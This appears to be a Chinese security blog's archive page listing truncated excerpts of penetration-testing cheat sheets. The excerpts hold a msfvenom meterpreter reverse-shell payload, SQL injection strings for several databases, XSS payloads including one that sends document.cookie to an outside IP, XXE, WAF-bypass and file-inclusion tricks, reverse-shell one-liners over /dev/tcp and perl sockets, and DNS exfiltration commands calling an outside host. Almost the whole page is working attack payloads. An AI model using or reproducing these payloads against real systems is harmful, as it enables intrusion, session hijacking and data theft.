02 2023 档案
摘要:windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -
阅读全文
摘要:联合注入 查数据库 union select null,schema_name,null from information_schema.schemata limit 1,1%23 查数据表: union select 1,table_name,3 from information_schema.t
阅读全文
摘要:获取数据库版本 union select 1,'a',(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25') from dual -- + 获取操作系统版本 union select 1,'a',(SELECT banner FROM
阅读全文
摘要:用户数据在$_SESSION中存储,当用户数据过大,内存占用过大,为了节省内存,选择把用户数据存储在文件中,即使用serialize()函数把用户数据存储到文件中,在使用的时候,在通过unserialize()函数调用 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过
阅读全文
摘要:SQLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。SQLServer数据库的最高权限 db权限:文件管理,数据库操作等权限 users-administrators public权限:数据库操作 guest-users 判断是否是SA权限 sel
阅读全文
摘要:Xpath注入原理: XPath注入攻击主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作,但是,注入的对象不是数据库users表了,而是一个存储数据的XML文件。 攻击者可以获取 XML 数据的组
阅读全文
摘要:常规payload <script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <scRipT>alert(999999)</ScriPt> <script src="http://xss.c
阅读全文
摘要:盲打cookie payload <script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script> <img src='http://192.168.0.176/Hcookie
阅读全文
摘要:XXE 有回显利用方式总结 结合外部实体声明(实体名称 SYSTEM ”uri/url“)和参数实体(% 实体名称 SYSTEM “uri-外部dtd”)有两种方式进行注入攻击 姿势一 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!
阅读全文
摘要:安全狗Bypass No.1 内联注释(/*![12345]*/)绕过方法: /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位 1
阅读全文
摘要:命令执行函数 system() passthru() exec() shell_exec() `反引号` ob_start() mail函数+LD_PRELOAD执行系统命令 system("whoami"); passthru("whoami"); exec("whoami"); shell_ex
阅读全文
摘要:**条件:**开启fopen 和 include lallow_url_include 是否允许引用URL文件 lallow_url_fopen 是否允许打开URL文件 **危害:**利用远程文件包含漏洞,可以直接执行任意命令。 **注意:在****php.ini中,allow_url_fopen默
阅读全文
摘要:nginx nginx <8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问: hack.jpg%00.php 就会执行PHP代码 nginx 1.6.2 http://www.test.com/1.txt/
阅读全文
摘要:CRLF注入原理: 一个HTTP请求报文由四个部分组成:请求行、请求头部、空行、请求数据。 请求行和请求头的尾部都有CRLF标志,请求头和请求体之间也是通过CRLF标志分割的。 CRLF注入漏洞就是利用Http的这种报文结构,向请求行或请求头的字段注入恶意的CRLF,就能注入一些首部字段或报文主体(
阅读全文
摘要:/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 /bin/sh -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_
阅读全文
摘要:JSON注入原理: JSON注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,程序没有对这些不可信赖的数据进行验证、过滤,如果应用程序使用未经验证的输入构造 JSON,则可以更改 JSON 数据的语义。在相对理想的情况下,攻击者可能会插入无关的元素,导致应用程序在解析 JSON数据时抛出异
阅读全文
摘要:1.原理 通过恶意payload组合的三级域名后对服务器发起的DNS请求。 2.利用场景 SQL注入 RCE(远程命令执行) SSRF(服务端请求伪造) RFI(远程文件包含) 3.Payload example curl http://huanxin.ceye.io/`whoami` ping `
阅读全文